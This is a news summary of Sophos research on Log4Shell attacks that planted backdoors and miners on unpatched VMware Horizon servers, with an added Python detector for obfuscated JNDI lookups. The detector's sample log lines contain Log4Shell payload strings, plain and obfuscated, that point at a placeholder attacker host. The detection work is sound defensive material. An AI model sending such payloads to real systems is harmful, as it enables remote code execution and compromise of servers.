
Sophos, a global leader in cyber security, has published research on the use of the Log4Shell vulnerability to plant backdoors and profiling scripts on VMware Horizon servers that had not been updated with security patches, thereby securing ongoing access to those servers and opening the door to future ransomware attacks.

Log4Shell is a vulnerability that enables remote code execution in Log4j, the Java-based logging library from the Apache Software Foundation that is embedded in hundreds of software products. The vulnerability was disclosed and patched in December 2021.

The research, entitled “Horde of miner bots and backdoors leveraged Log4J to attack VMware Horizon servers” and published on Sophos News, lists the tools and techniques used to compromise the servers, install three backdoors and deploy four different cryptocurrency miners.

“Widely used applications like VMware Horizon that are exposed to the Internet and require manual updates are particularly vulnerable to large-scale exploitation,” said Sean Gallagher, a senior security researcher at Sophos.

Sophos’ detection telemetry revealed waves of attacks on Horizon servers starting in January, which planted a variety of backdoors and cryptocurrency miners on unpatched servers, along with scripts that collect information about the compromised server.

The attack chains Sophos identified that used Log4Shell against vulnerable Horizon servers include two legitimate remote monitoring and management tools, the Atera agent and Splashtop Streamer, which were apparently intended for malicious use as backdoors, and the malicious Sliver backdoor.

“Sophos believes that some of the backdoors may have been delivered by initial access brokers looking to establish persistent remote access to high-value targets that they can sell on to other attackers, such as ransomware operators.”
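The Log4Shell lookup strings that these attacks send are easy to spot in a Horizon server’s web logs when they arrive as a literal `${jndi:`, but the campaigns that followed the December 2021 disclosure routinely nested lookups such as `${lower:j}` and `${::-j}` to slip past naive string matching. The Python detector below is an added example, not code from Sophos or from the research it describes; the function names are the author’s own, the normalization covers only the `${lower:}`, `${upper:}` and `${...:-x}` substitutions commonly seen in the wild, and the sample access-log lines are constructed (the hosts and paths are placeholders, not indicators from the report).

```python
"""Detect Log4Shell (CVE-2021-44228) lookup strings in web-server logs, including
the nested-lookup obfuscations that defeat a plain search for "${jndi:".
Added example with constructed sample data; not taken from the Sophos research."""
import re

# ${lower:X} / ${upper:X} -> X in that case;  ${anything:-X} and ${::-X} -> X.
# These are the substitutions attackers used to hide the literal "jndi".
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_VALUE = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# The de-obfuscated lookup we are really looking for: ${jndi:<scheme>:...}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)


def normalize_lookups(text: str, max_rounds: int = 32) -> str:
    """Collapse nested Log4j lookups innermost-first until the text stops changing.

    max_rounds bounds the work so a hostile line cannot make this loop forever."""
    for _ in range(max_rounds):
        step = _CASE_LOOKUP.sub(
            lambda m: m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper(),
            text,
        )
        step = _DEFAULT_VALUE.sub(lambda m: m.group(1), step)
        if step == text:
            break
        text = step
    return text


def find_jndi(text: str):
    """Return the JNDI scheme (e.g. 'ldap', 'rmi', 'dns') if the line carries a
    lookup after de-obfuscation, otherwise None."""
    m = _JNDI.search(normalize_lookups(text))
    return m.group(1).lower() if m else None


def scan_log(lines):
    """Return [(line_number, scheme, normalized_line)] for every suspicious line."""
    hits = []
    for n, line in enumerate(lines, 1):
        scheme = find_jndi(line)
        if scheme:
            hits.append((n, scheme, normalize_lookups(line)))
    return hits


# Constructed access-log lines in the style of Horizon's Tomcat-fronted web services.
# Addresses are RFC 5737 documentation ranges; none of this is real attacker data.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Jan/2022:03:12:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [15/Jan/2022:03:12:04 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.9:1389/a}"',
    '198.51.100.9 - - [15/Jan/2022:03:12:05 +0000] "GET /broker/xml HTTP/1.1" 404 0 "-" "${${lower:j}ndi:${lower:r}mi://198.51.100.9:1099/b}"',
    '198.51.100.9 - - [15/Jan/2022:03:12:06 +0000] "GET /broker/xml HTTP/1.1" 404 0 "-" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://198.51.100.9:1389/c}"',
    '198.51.100.9 - - [15/Jan/2022:03:12:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi${env:NaN:-:}dns://198.51.100.9/d}"',
    '203.0.113.8 - - [15/Jan/2022:03:13:00 +0000] "GET /portal/?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for n, scheme, shown in scan_log(SAMPLE_LOG):
        print(f"line {n}: jndi scheme={scheme}: {shown}")
```

Lines 2 to 5 of the sample are flagged (schemes `ldap`, `rmi`, `ldap`, `dns`); the benign `${date:yyyy}` on line 6 is not, because only a resolved `jndi` lookup counts. The normalization is an approximation of Log4j’s own interpolation, not a reimplementation of it: a real server would also expand `${env:...}` and `${sys:...}` to live values, and the payload can sit in any logged field, not just the User-Agent. Treat a hit as high-confidence and a miss as no proof of absence, and pair log scanning with the patch status of the Horizon host itself.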
